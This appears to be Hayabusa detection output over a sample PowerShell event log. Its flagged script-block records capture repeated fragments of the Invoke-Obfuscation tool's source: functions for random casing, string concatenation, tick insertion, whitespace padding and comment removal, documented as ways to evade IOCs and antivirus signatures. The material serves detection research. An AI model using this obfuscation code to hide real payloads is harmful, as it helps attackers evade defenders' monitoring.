PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Type token value. .EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} C:\PS> $ScriptString sET EOU ( [TYPe]('CO'+'NS'+'oLe')) ; ( CHILdiTEM VariablE:EOU ).VALUE::WriteLine('Hello World!'); $eoU::WriteLine('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} C:\PS> $ScriptString SET-vAriablE BVgz6n ([tYpe](""{2}{1}{0}"" -f'sOle','On','C') ) ; $BVGz6N::WriteLine('Hello World!'); ( cHilDItem vAriAbLE:bVGZ6n ).VAlue::WriteLine('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 1 C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # If we are dealing with a Type that is found in $TypesThatCannotByDirectTypeCasted then return as is since it will error if we try to direct Type cast. ForEach($Type in $TypesThatCannotByDirectTypeCasted) { If($Token.Content.ToLower().Contains($Type)) { Return $ScriptString } } # If we are dealing with a Type that is NOT immediately followed by a Member token (denoted by . or :: operators) then we won't obfuscated. # This is for Type tokens like: [Char][Int]'123' etc. If(($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,1) -ne '.') -AND ($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,2) -ne '::')) { Return $ScriptString } # This variable will be used to track the growth in length of $ScriptString since we'll be appending variable creation at the beginning of $ScriptString. # This will allow us to avoid tokenizing $ScriptString for every single Type token that is present. $PrevLength = $ScriptString.Length # See if we've already set another instance of this same Type token previously in this obfsucation iteration. $RandomVarName = $NULL $UsingPreviouslyDefinedVarName = $FALSE ForEach($DefinedTokenVariable in $Script:TypeTokenVariableArray) { If($Token.Content.ToLower() -eq $DefinedTokenVariable[0]) { $RandomVarName = $DefinedTokenVariable[1] $UsingPreviouslyDefinedVarName = $TRUE } } # If we haven't already defined a random variable for this Token type then we will do that. Otherwise we will use the previously-defined variable. If(!($UsingPreviouslyDefinedVarName)) { # User input $ObfuscationLevel (1-2) will choose between concatenating Type token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce another Type token unnecessarily ([Regex]). # Trim of encapsulating square brackets before obfuscating the string value of the Type token. $TokenContent = $Token.Content.Trim('[]') Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Type Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Add syntax for direct type casting. $ObfuscatedTokenTypeCast = '[type]' + '(' + $ObfuscatedToken + ')' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Track this variable name and Type token so we can reuse this variable name for future uses of this same Type token in this obfuscation iteration. $Script:TypeTokenVariableArray += , @($Token.Content,$RandomVarName) } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' $RandomVarSetSyntax += 'Set-Item' + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # If we're using an existing variable already set in ScriptString for the current Type token then we don't need to prepend an additional SET variable syntax. $PortionToPrependToScriptString = '' If(!($UsingPreviouslyDefinedVarName)) { $PortionToPrependToScriptString = ' '*(Get-Random @(0..2)) + $RandomVarSet + ' '*(Get-Random @(0..2)) + ';' + ' '*(Get-Random @(0..2)) } # Add the obfuscated token back to $ScriptString. $ScriptString = $PortionToPrependToScriptString + $ScriptString.SubString(0,$Token.Start+$Script:TypeTokenScriptStringGrowth) + ' '*(Get-Random @(1..2)) + $RandomVarGet + $ScriptString.SubString($Token.Start+$Token.Length+$Script:TypeTokenScriptStringGrowth) # Keep track how much $ScriptString grows for each Type token obfuscation iteration. $Script:TypeTokenScriptStringGrowth = $Script:TypeTokenScriptStringGrowth + $PortionToPrependToScriptString.Length Return $ScriptString } Function Out-ObfuscatedVariableTokenLevel1 { <# .SYNOPSIS Obfuscates variable token by randomizing its case, randomly adding ticks and wrapping it in curly braces. Invoke-Obfuscation Function: Out-ObfuscatedVariableTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedVariableTokenLevel1 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Variable'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} C:\PS> $ScriptString ${m`e`ssAge1} = 'Hello World!'; Write-Host ${MEss`Ag`e1} -ForegroundColor Green; ${meSsAg`e`2} = 'Obfuscation Rocks!'; Write-Host ${M`es`SagE2} -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green} 'Variable' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Return as-is if the variable is already encapsulated with ${}. Otherwise you will get errors if you have something like ${var} turned into ${${var}} If($ScriptString.SubString($Token.Start,2) -eq '${') { Return $ScriptString } # Length of pre-obfuscated ScriptString will be important in extracting out the obfuscated token before we add curly braces. $PrevLength = $ScriptString.Length $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token # Pull out ObfuscatedToken from ScriptString and add curly braces around obfuscated variable token. $ObfuscatedToken = $ScriptString.SubString($Token.Start,$Token.Length+($ScriptString.Length-$PrevLength)) $ObfuscatedToken = '${' + $ObfuscatedToken.Trim('""') + '}' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length+($ScriptString.Length-$PrevLength)) Return $ScriptString } Function Out-RandomCaseToken { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and reinserting it into the ScriptString input variable. Invoke-Obfuscation Function: Out-RandomCaseToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCaseToken obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RandomCaseToken $ScriptString $Token} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor GREeN; Write-Host 'Obfuscatio",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"n Rocks!' -ForegroundColor gReeN .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # Convert character array back to string. $ObfuscatedToken = $TokenArray -Join '' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ConcatenatedString { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string by randomly concatenating it and encapsulating the result with input single- or double-quotes. Invoke-Obfuscation Function: Out-ConcatenatedString Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ConcatenatedString obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputVal Specifies the string to obfuscate. .PARAMETER Quote Specifies the single- or double-quote used to encapsulate the concatenated string. .EXAMPLE C:\PS> Out-ConcatenatedString ""String to be concatenated"" '""' ""String ""+""to be ""+""co""+""n""+""c""+""aten""+""at""+""ed .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $InputVal, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Char] $Quote ) # Strip leading and trailing single- or double-quotes if there are no more quotes of the same kind in $InputVal. # E.g. 'stringtoconcat' will have the leading and trailing quotes removed and will use $Quote. # But a string ""'G'+'"" passed to this function as 'G'+' will have all quotes remain as part of the $InputVal string. If($InputVal.Contains(""'"")) {$InputVal = $InputVal.Replace(""'"",""`'"")} If($InputVal.Contains('""')) {$InputVal = $InputVal.Replace('""','`""')} # Do nothing if string is of length 2 or less $ObfuscatedToken = '' If($InputVal.Length -le 2) { $ObfuscatedToken = $Quote + $InputVal + $Quote Return $ObfuscatedToken } # Choose a random percentage of characters to have concatenated in current token. # If the current token is greater than 1000 characters (as in SecureString or Base64 strings) then set $ConcatPercent much lower If($InputVal.Length -gt 25000) { $ConcatPercent = Get-Random -Minimum 0.05 -Maximum 0.10 } ElseIf($InputVal.Length -gt 1000) { $ConcatPercent = Get-Random -Minimum 2 -Maximum 4 } Else { $ConcatPercent = Get-Random -Minimum 15 -Maximum 30 } # Convert $ConcatPercent to the exact number of characters to concatenate in the current token. $ConcatCount = [Int]($InputVal.Length*($ConcatPercent/100)) # Guarantee that at least one concatenation will occur. If($ConcatCount -eq 0) { $ConcatCount = 1 } # Select random indexes on which to concatenate. $CharIndexesToConcat = (Get-Random -InputObject (1..($InputVal.Length-1)) -Count $ConcatCount) | Sort-Object # Perform inline concatenation. $LastIndex = 0 ForEach($IndexToObfuscate in $CharIndexesToConcat) { # Extract substring to concatenate with $ObfuscatedToken. $SubString = $InputVal.SubString($LastIndex,$IndexToObfuscate-$LastIndex) # Concatenate with quotes and addition operator. $ObfuscatedToken += $SubString + $Quote + ""+"" + $Quote $LastIndex = $IndexToObfuscate } # Add final substring. $ObfuscatedToken += $InputVal.SubString($LastIndex) $ObfuscatedToken += $FinalSubString # Add final quotes if necessary. If(!($ObfuscatedToken.StartsWith($Quote) -AND $ObfuscatedToken.EndsWith($Quote))) { $ObfuscatedToken = $Quote + $ObfuscatedToken + $Quote } # Remove any existing leading or trailing empty string concatenation. If($ObfuscatedToken.StartsWith(""''+"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(3) } If($ObfuscatedToken.EndsWith(""+''"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } Return $ObfuscatedToken } Function Out-RandomCase { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string or char[] by randomizing its case. Invoke-Obfuscation Function: Out-RandomCase Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCase obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputValStr Specifies the string to obfuscate. .PARAMETER InputVal Specifies the char[] to obfuscate. .EXAMPLE C:\PS> Out-RandomCase ""String to have case randomized"" STrINg to haVe caSe RAnDoMIzeD C:\PS> Out-RandomCase ([char[]]""String to have case randomized"") StrING TO HavE CASE randOmIzeD .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'InputVal')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'InputValStr')] [ValidateNotNullOrEmpty()] [String] $InputValStr, [Parameter(Position = 0, ParameterSetName = 'InputVal')] [ValidateNotNullOrEmpty()] [Char[]] $InputVal ) If($PSBoundParameters['InputValStr']) { # Convert string to char array for easier manipulation. $InputVal = [Char[]]$InputValStr } # Randomly convert each character to upper- or lower-case. $OutputVal = ($InputVal | ForEach-Object {If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}}) -Join '' Return $OutputVal } Function Out-RandomWhitespace { <# .SYNOPSIS Obfuscates operator/groupstart/groupend/statementseparator token by adding random amounts of whitespace before/after the token depending on the token value and its immediate surroundings in the input script. Invoke-Obfuscation Function: Out-RandomWhitespace Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomWhitespace adds random whitespace before/after a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If(($Tokens[$i].Type -eq 'Operator') -OR ($Tokens[$i].Type -eq 'GroupStart') -OR ($Tokens[$i].Type -eq 'GroupEnd')) {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i}} C:\PS> $ScriptString Write-Host ('Hel'+ 'lo Wo' + 'rld!') -ForegroundColor Green; Write-Host ( 'Obfu' +'scation Ro' + 'cks!') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green} 'RandomWhitespace' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index ) $Token = $Tokens[$Index] $ObfuscatedToken = $Token.Content # Do not add DEFAULT setting in below Switch block. Switch($Token.Content) { '(' {$ObfuscatedToken = $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} ')' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken} ';' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '|' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '+' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '=' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '&' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '.' { # Retrieve character in script immediately preceding the current token If($Index -eq 0) {$PrevChar = ' '} Else {$PrevChar = $ScriptString.SubString($Token.Start-1,1)} # Only add randomized whitespace to . if it is acting as a standalone invoke operator (either at the beginning of the script or immediately preceded by ; or whitespace) If(($PrevChar -eq ' ') -OR ($PrevChar -eq ';')) {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} } } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-RemoveComments { <# .SYNOPSIS Obfuscates variable token by removing all comment tokens. This is primarily since A/V uses strings in comments as part of many of their signatures for well known PowerShell scripts like Invoke-Mimikatz. Invoke-Obfuscation Function: Out-RemoveComments Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RemoveComments obfuscates a given token by removing all comment tokens from the provided PowerShell script to evade detection by simple IOCs or A/V signatures based on strings in PowerShell script comments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green #COMMENT"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Comment'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RemoveComments $ScriptString $Token} C:\PS> $ScriptString $Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green #COMMENT} 'Comment' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Remove current Comment token. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"n Rocks!' -ForegroundColor gReeN .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # Convert character array back to string. $ObfuscatedToken = $TokenArray -Join '' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ConcatenatedString { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string by randomly concatenating it and encapsulating the result with input single- or double-quotes. Invoke-Obfuscation Function: Out-ConcatenatedString Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ConcatenatedString obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputVal Specifies the string to obfuscate. .PARAMETER Quote Specifies the single- or double-quote used to encapsulate the concatenated string. .EXAMPLE C:\PS> Out-ConcatenatedString ""String to be concatenated"" '""' 